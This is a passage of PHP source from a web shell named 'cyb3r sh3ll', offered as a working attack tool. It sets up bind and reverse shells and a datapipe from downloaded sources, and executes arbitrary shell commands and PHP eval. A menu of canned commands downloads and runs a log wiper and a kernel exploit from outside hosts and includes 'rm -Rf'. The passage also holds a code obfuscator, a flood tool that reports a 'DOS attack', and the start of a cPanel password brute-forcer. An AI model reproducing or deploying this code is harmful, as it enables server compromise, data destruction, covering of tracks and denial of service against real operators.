  3190. echo "<center><table width=\"50%\">Whois:<form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
  3191. }
  3192. }
  3193. if ($act == "cracker")
  3194. {
  3195. echo "
  3196. <br><center>
  3197. <a href=\"".$surl."act=hash\" >Hash</a><font color='silver'> -|- </font>
  3198. <a href=\"".$surl."act=smtp\" >SMTP</a><font color='silver'> -|- </font>
  3199. <a href=\"".$surl."act=pop3\" >POP3</a><font color='silver'> -|- </font>
  3200. <a href=\"".$surl."act=imap\" >IMAP</a><font color='silver'> -|- </font>
  3201. <a href=\"".$surl."act=ftp\" >FTP</a><font color='silver'> -|- </font>
  3202. <a href=\"".$surl."act=snmp\" >SNMP</a><font color='silver'> -|- </font>
  3203. <a href=\"".$surl."act=mysql\" >MySQL</a><font color='silver'> -|- </font>
  3204. <a href=\"".$surl."act=htmlform\" >HTTP Form</a><font color='silver'> -|- </font>
  3205. <a href=\"".$surl."act=basicauth\" >HTTP Auth(basic)</a><font color='silver'> -|- </font>
  3206. <a href=\"".$surl."act=cpanel\" >CPANEL</a><font color='silver'> -|- </font>
  3207. <a href=\"".$surl."act=dic\" >Dictionary Maker</a>
  3208. </center><br>";
  3209. }
  3210. if ($act == "shells")
  3211. { ?>
  3212. <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%" border=1>
  3213. <tr> <!-- 1 -->
  3214. <td valign="top" width="50%" ><p align="center"><b>(: Bind/Reverse Shell :)</b></p></td>
  3215. <td valign="top" ><p align="center"><b>[: Web Shell :]</b></p></td>
  3216. </tr>
  3217. <tr><!-- 2 -->
  3218. <td valign="top" ><center>
  3219. <?php
  3220. $bndportsrcs = array(
  3221. "cyb3r_bindport.pl"=>array("Using PERL","perl %path %port"),
  3222. "cyb3r_bindport.c"=>array("Using C","%path %port %pass")
  3223. );
  3224. $bcsrcs = array(
  3225. "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  3226. "cyb3r_backconn.c"=>array("Using C","%path %host %port")
  3227. );
  3228. $dpsrcs = array(
  3229. "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
  3230. "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
  3231. );
  3232. if (!is_array($bind)) {$bind = array();}
  3233. if (!is_array($bc)) {$bc = array();}
  3234. if (!is_array($datapipe)) {$datapipe = array();}
  3235. if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
  3236. if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
  3237. if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
  3238. if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
  3239. if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
  3240. if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
  3241. if (!empty($bindsubmit))
  3242. {
  3243. echo "<b>Result of binding port:</b><br>";
  3244. $v = $bndportsrcs[$bind["src"]];
  3245. if (empty($v)) {echo "Unknown file!<br>";}
  3246. elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  3247. else
  3248. {
  3249. $w = explode(".",$bind["src"]);
  3250. $ext = $w[count($w)-1];
  3251. unset($w[count($w)-1]);
  3252. $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  3253. $binpath = $tmpdir.join(".",$w).rand(0,999);
  3254. if ($ext == "pl") {$binpath = $srcpath;}
  3255. @unlink($srcpath);
  3256. $fp = fopen($srcpath,"ab+");
  3257. if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  3258. elseif (!$data = cyb3rgetsource($bind["src"])) {echo "Can't download sources!";}
  3259. else
  3260. {
  3261. fwrite($fp,$data,strlen($data));
  3262. fclose($fp);
  3263. if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  3264. $v[1] = str_replace("%path",$binpath,$v[1]);
  3265. $v[1] = str_replace("%port",$bind["port"],$v[1]);
  3266. $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
  3267. $v[1] = str_replace("//","/",$v[1]);
  3268. $retbind = myshellexec($v[1]." > /dev/null &");
  3269. sleep(5);
  3270. $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
  3271. if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
  3272. else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
  3273. }
  3274. echo "<br>";
  3275. }
  3276. }
  3277. if (!empty($bcsubmit))
  3278. {
  3279. echo "<b>Result of back connection:</b><br>";
  3280. $v = $bcsrcs[$bc["src"]];
  3281. if (empty($v)) {echo "Unknown file!<br>";}
  3282. else
  3283. {
  3284. $w = explode(".",$bc["src"]);
  3285. $ext = $w[count($w)-1];
  3286. unset($w[count($w)-1]);
  3287. $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  3288. $binpath = $tmpdir.join(".",$w).rand(0,999);
  3289. if ($ext == "pl") {$binpath = $srcpath;}
  3290. @unlink($srcpath);
  3291. $fp = fopen($srcpath,"ab+");
  3292. if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  3293. elseif (!$data = cyb3rgetsource($bc["src"])) {echo "Can't download sources!";}
  3294. else
  3295. {
  3296. fwrite($fp,$data,strlen($data));
  3297. fclose($fp);
  3298. if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  3299. $v[1] = str_replace("%path",$binpath,$v[1]);
  3300. $v[1] = str_replace("%host",$bc["host"],$v[1]);
  3301. $v[1] = str_replace("%port",$bc["port"],$v[1]);
  3302. $v[1] = str_replace("//","/",$v[1]);
  3303. $retbind = myshellexec($v[1]." > /dev/null &");
  3304. echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
  3305. }
  3306. }
  3307. }
  3308. if (!empty($dpsubmit))
  3309. {
  3310. echo "<b>Result of datapipe-running:</b><br>";
  3311. $v = $dpsrcs[$datapipe["src"]];
  3312. if (empty($v)) {echo "Unknown file!<br>";}
  3313. elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  3314. else
  3315. {
  3316. $srcpath = $tmpdir.$datapipe["src"];
  3317. $w = explode(".",$datapipe["src"]);
  3318. $ext = $w[count($w)-1];
  3319. unset($w[count($w)-1]);
  3320. $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  3321. $binpath = $tmpdir.join(".",$w).rand(0,999);
  3322. if ($ext == "pl") {$binpath = $srcpath;}
  3323. @unlink($srcpath);
  3324. $fp = fopen($srcpath,"ab+");
  3325. if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  3326. elseif (!$data = cyb3rgetsource($datapipe["src"])) {echo "Can't download sources!";}
  3327. else
  3328. {
  3329. fwrite($fp,$data,strlen($data));
  3330. fclose($fp);
  3331. if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  3332. list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
  3333. $v[1] = str_replace("%path",$binpath,$v[1]);
  3334. $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
  3335. $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
  3336. $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
  3337. $v[1] = str_replace("//","/",$v[1]);
  3338. $retbind = myshellexec($v[1]." > /dev/null &");
  3339. sleep(5);
  3340. $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
  3341. if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
  3342. else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
  3343. }
  3344. echo "<br>";
  3345. }
  3346. }
  3347. ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
  3348. foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  3349. ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
  3350. <b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
  3351. foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  3352. ?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
  3353. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
  3354. <b>Datapipe:</b><br>
  3355. <form action="<?php echo $surl; ?>">
  3356. <input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
  3357. foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  3358. ?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.
  3359. </center></td>
  3360. <td ><center>
  3361. <p align="center"><b>[: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Enter Command to Execute:</b></a> :]</b>
  3362. <form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></p><br>
  3363. <div align="center">Useful Commands </div>
  3364. <form action="<?php echo $surl; ?>">
  3365. <div align="center">
  3366. <input type=hidden name=act value="cmd">
  3367. <input type=hidden name="d" value="<?php echo $dispd; ?>">
  3368. <SELECT NAME="cmd">
  3369. <OPTION VALUE="uname -a">Kernel version</option>
  3370. <OPTION VALUE="w">Logged in users</option>
  3371. <OPTION VALUE="lastlog">Last to connect</option>
  3372. <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>
  3373. <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>
  3374. <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>
  3375. <OPTION VALUE="which wget curl w3m lynx">Downloaders?</option>
  3376. <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO</option>
  3377. <OPTION VALUE="netstat -atup | grep IST">Open ports</option>
  3378. <OPTION VALUE="locate gcc">gcc installed?</option>
  3379. <OPTION VALUE="rm -Rf">Format box (DANGEROUS)</option>
  3380. <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)</option>
  3381. <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2</option>
  3382. <OPTION VALUE="./zap2">WIPELOGS PT3</option>
  3383. <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)</option>
  3384. <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)</option>
  3385. <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)</option>
  3386. <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)</option>
  3387. <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)</option>
  3388. <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)</option>
  3389. </SELECT>
  3390. <input type=hidden name="cmd_txt" value="1">
  3391. &nbsp;
  3392. <input type=submit name=submit value="Execute">
  3393. <br>
  3394. Warning. Kernel may be alerted using higher levels </div>
  3395. </form>
  3396. </center>
  3397. </td>
  3398. </tr>
  3399. </table><?php
  3400. }
  3401. if ($act == "cmd")
  3402. {
  3403. if (trim($cmd) == "ps -aux") {$act = "processes";}
  3404. elseif (trim($cmd) == "tasklist") {$act = "processes";}
  3405. else
  3406. {
  3407. @chdir($chdir);
  3408. if (!empty($submit))
  3409. {
  3410. echo "<b>Result of execution this command</b>:<br>";
  3411. $olddir = realpath(".");
  3412. @chdir($d);
  3413. $ret = myshellexec($cmd);
  3414. $ret = convert_cyr_string($ret,"d","w");
  3415. if ($cmd_txt)
  3416. {
  3417. $rows = count(explode("\r\n",$ret))+1;
  3418. if ($rows < 10) {$rows = 10;}
  3419. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  3420. }
  3421. else {echo $ret."<br>";}
  3422. @chdir($olddir);
  3423. }
  3424. else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
  3425. echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  3426. }
  3427. }
  3428. if ($act == "phpcode")
  3429. {
  3430. echo "
  3431. <br><center>
  3432. <a href=\"".$surl."act=eval\" >PHP Code Evaluate</a><font color='silver'> -|- </font>
  3433. <a href=\"".$surl."act=masscode\" >Mass Code Injector</a><font color='silver'> -|- </font>
  3434. <a href=\"".$surl."act=obfuscate\" >PHP Obfuscator</a><font color='silver'> -|- </font>
  3435. <a href=\"".$surl."act=fuzzer\" >Web Server Fuzzer</a>
  3436. </center><br>";
  3437. }
  3438. if ($act == "eval")
  3439. {
  3440. if (!empty($eval))
  3441. {
  3442. echo "<b>Result of execution this PHP-code</b>:<br>";
  3443. $tmp = ob_get_contents();
  3444. $olddir = realpath(".");
  3445. @chdir($d);
  3446. if ($tmp)
  3447. {
  3448. ob_clean();
  3449. eval($eval);
  3450. $ret = ob_get_contents();
  3451. $ret = convert_cyr_string($ret,"d","w");
  3452. ob_clean();
  3453. echo $tmp;
  3454. if ($eval_txt)
  3455. {
  3456. $rows = count(explode("\r\n",$ret))+1;
  3457. if ($rows < 10) {$rows = 10;}
  3458. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  3459. }
  3460. else {echo $ret."<br>";}
  3461. }
  3462. else
  3463. {
  3464. if ($eval_txt)
  3465. {
  3466. echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  3467. eval($eval);
  3468. echo "</textarea>";
  3469. }
  3470. else {echo $ret;}
  3471. }
  3472. @chdir($olddir);
  3473. }
  3474. else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  3475. echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  3476. }
  3477. if ($act == "proxy")
  3478. {
  3479. global $errorbox,$et,$footer,$hcwd;
  3480. echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
  3481. if (!empty($_REQUEST['urL'])){
  3482. $dir="";
  3483. $u=parse_url($_REQUEST['urL']);
  3484. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  3485. if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
  3486. $url=@fsockopen($host, 80, $errno, $errstr, 12);
  3487. if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
  3488. fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
  3489. while(!feof($url)){
  3490. $con = fgets($url);
  3491. $con = str_replace("href=mailto","HrEf=mailto",$con);
  3492. $con = str_replace("HREF=mailto","HrEf=mailto",$con);
  3493. $con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
  3494. $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
  3495. $con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
  3496. $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
  3497. $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  3498. $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  3499. $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  3500. $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  3501. $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
  3502. $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
  3503. $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  3504. $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  3505. $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  3506. $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  3507. $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  3508. $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  3509. echo $con;
  3510. }
  3511. fclose($url);
  3512. }
  3513. }
  3514. if ($act == "obfuscate")
  3515. {
  3516. if ( isset($_POST['code']) &&
  3517. $_POST['code'] != '')
  3518. {
  3519. $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
  3520. $encode = '
  3521. <?php
  3522. $encoded = \''.$encoded.'\';
  3523. eval(gzinflate(base64_decode($encoded)));
  3524. // Encoded by cyb3r sh3ll. Thanx lionaneesh for this idea.
  3525. ?>
  3526. ';
  3527. }
  3528. else
  3529. {
  3530. $encode = 'Please Enter your Code! and Click Submit! :)';
  3531. }?>
  3532. <form method="POST">
  3533. <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
  3534. <input style="margin: 20px; margin-left: 50px; padding: 10px;" class="own" type="submit" value="Encode :D"/>
  3535. </form>
  3536. <?php
  3537. }
  3538. if ($act == "fuzzer")
  3539. {
  3540. if(isset($_POST['ip']) &&
  3541. isset($_POST['port']) &&
  3542. isset($_POST['times']) &&
  3543. isset($_POST['time']) &&
  3544. isset($_POST['message']) &&
  3545. isset($_POST['messageMultiplier']) &&
  3546. $_POST['message'] != "" &&
  3547. $_POST['time'] != "" &&
  3548. $_POST['times'] != "" &&
  3549. $_POST['port'] != "" &&
  3550. $_POST['ip'] != "" &&
  3551. $_POST['messageMultiplier'] != ""
  3552. )
  3553. {
  3554. $IP=$_POST['ip'];
  3555. $port=$_POST['port'];
  3556. $times = $_POST['times'];
  3557. $timeout = $_POST['time'];
  3558. $send = 0;
  3559. $ending = "";
  3560. $multiplier = $_POST['messageMultiplier'];
  3561. $data = "";
  3562. $mode="tcp";
  3563. $data .= "POST /";
  3564. $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
  3565. if($_POST['type'] == "tcp")
  3566. {
  3567. $mode = "tcp";
  3568. }
  3569. while($multiplier--)
  3570. {
  3571. $data .= urlencode($_POST['message']);
  3572. }
  3573. $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
  3574. $data .= "by-cyb3r-sh3ll".$ending;
  3575. $length = strlen($data);
  3576. echo "Sending Data :- <br /> <p align='center'>$data</p>";
  3577. print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message <br>";
  3578. for($i=0;$i<$times;$i++)
  3579. {
  3580. $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
  3581. if($socket)
  3582. {
  3583. fwrite($socket , $data , $length );
  3584. fclose($socket);
  3585. }
  3586. }
  3587. echo "<script>alert('Fuzzing Completed!');</script>";
  3588. echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
  3589. echo "Total Number of Packets Sent : " . $times . "<br />";
  3590. echo "Total Data Sent = ". showsizE($times*$length) . "<br />";
  3591. echo "Data per packet = " . showsizE($length) . "<br />";
  3592. }
  3593. else
  3594. {
  3595. ?>
  3596. <form method="POST">
  3597. <input type="hidden" name="fuzz" />
  3598. <table id="margins">
  3599. <tr>
  3600. <td width="400" class="title">
  3601. IP
  3602. </td>
  3603. <td>
  3604. <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
  3605. </td>
  3606. </tr>
  3607. <tr>
  3608. <td class="title">
  3609. Port
  3610. </td>
  3611. <td>
  3612. <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
  3613. </td>
  3614. </tr>
  3615. <tr>
  3616. <td class="title">
  3617. Timeout
  3618. </td>
  3619. <td>
  3620. <input type="text" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
  3621. </td>
  3622. </tr>
  3623. <tr>
  3624. <td class="title">
  3625. No of times
  3626. </td>
  3627. <td>
  3628. <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
  3629. </td>
  3630. </tr>
  3631. <tr>
  3632. <td class="title">
  3633. Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
  3634. </td>
  3635. <td>
  3636. <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
  3637. </td>
  3638. <td>
  3639. x
  3640. </td>
  3641. <td width="20">
  3642. <input style="width: 30px;" name="messageMultiplier" value="10" />
  3643. </td>
  3644. </tr>
  3645. <tr>
  3646. <td rowspan="2">
  3647. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it be! :D"/>
  3648. </td>
  3649. </tr>
  3650. </table>
  3651. </form>
  3652. <?php
  3653. }
  3654. }
  3655. if ($act == "cpanel")
  3656. {
  3657. $cpanel_port="2082";
  3658. $connect_timeout=5;
  3659. set_time_limit(0);
  3660. $submit=$_REQUEST['submit'];
  3661. $users=$_REQUEST['users'];
  3662. $pass=$_REQUEST['passwords'];
  3663. $target=$_REQUEST['target'];
  3664. $cracktype=$_REQUEST['cracktype'];
  3665. if($target == ""){
  3666. $target = "localhost";
  3667. }
  3668. $charset=$_REQUEST['charset'];
  3669. if($charset=="")
  3670. $charset="lowercase";
  3671. $max_length=$_REQUEST['max_length'];
  3672. if($max_length=="")
  3673. $max_length=10;
  3674. $min_length=$_REQUEST['min_length'];
  3675. if($min_length=="")
  3676. $min_length=1;
  3677. $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  3678. $charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
  3679. $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
  3680. $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  3681. $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  3682. $charsetuppernumeric = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  3683. $charsetletters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" );
  3684. $charsetsymbols= array("!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3685. $charsetlowersymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3686. $charsetuppersymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3687. $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3688. $charsetnumericsymbols = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3689. $charsetlowernumericsymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3690. $charsetuppernumericsymbols = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9","!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
  3691. $charsetletterssymbols = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" ,"!", "@", "#", "$", "%", "^", "&", "*", "(", ")","_" );
